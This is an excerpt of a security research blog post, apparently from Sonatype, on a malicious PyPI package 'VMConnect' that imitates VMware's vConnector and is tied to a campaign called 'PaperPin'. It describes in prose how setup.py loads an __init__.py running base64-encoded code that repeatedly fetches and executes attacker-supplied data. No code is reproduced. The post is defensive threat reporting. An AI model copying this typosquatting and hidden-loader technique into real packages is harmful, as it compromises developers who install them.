This month, we analyzed a malicious PyPI package called ‘VMConnect,’ which has been designed to strongly resemble the legitimate VMware vSphere connector module, ‘vConnector,’ except it hides sinister code within.

Assigned sonatype-2023-3387 and discovered by Sonatype’s automated detection systems last week, ‘VMConnect’ contains much the same code as its legitimate counterpart and has been downloaded 225 times, according to pepy.tech.

While investigating this package, we discovered two other packages that emerged, “ethter” (251 downloads) and “quantiumbase” (212 downloads), bear an identical structure and technique and contain identical payload to the package in question. Within this brief timeframe of emerging packages, each with its distinct name and target, we discerned an ongoing campaign which we dubbed “PaperPin.” This campaign is an enigma to unravel, as we explain below.

VMConnect: A counterfeit VMware module

The ‘VMConnect’ package appeared on the PyPI registry on July 28th – the same day it was spotted by us. It bears much the same description as the real VMware vSphere module:

Image above: Fake ‘VMConnect’ package (left) and the legitimate ‘vconnector’ Python module (right)

The ‘setup.py’ file within the malicious ‘VMConnect’ package loads the contents of ‘__init__.py’ file (line 8):

This is where it gets interesting, whereas in the GitHub version (archived) of ‘VMConnect’, the __init__.py file contains just the version number, the release published to PyPI is starkly different.

The __init__.py within the PyPI package, purportedly published by the same user (“hushki502”) runs base64-encoded code (line 25):

Sonatype’s Senior Security Researcher Ankita Lamba who analyzed the counterfeit package stated that the encoded-string “retrieves data from an attacker-controlled URL and attempts to execute it on the host machine. This behavior is carried out every minute, infinitely.”

The (Read more...)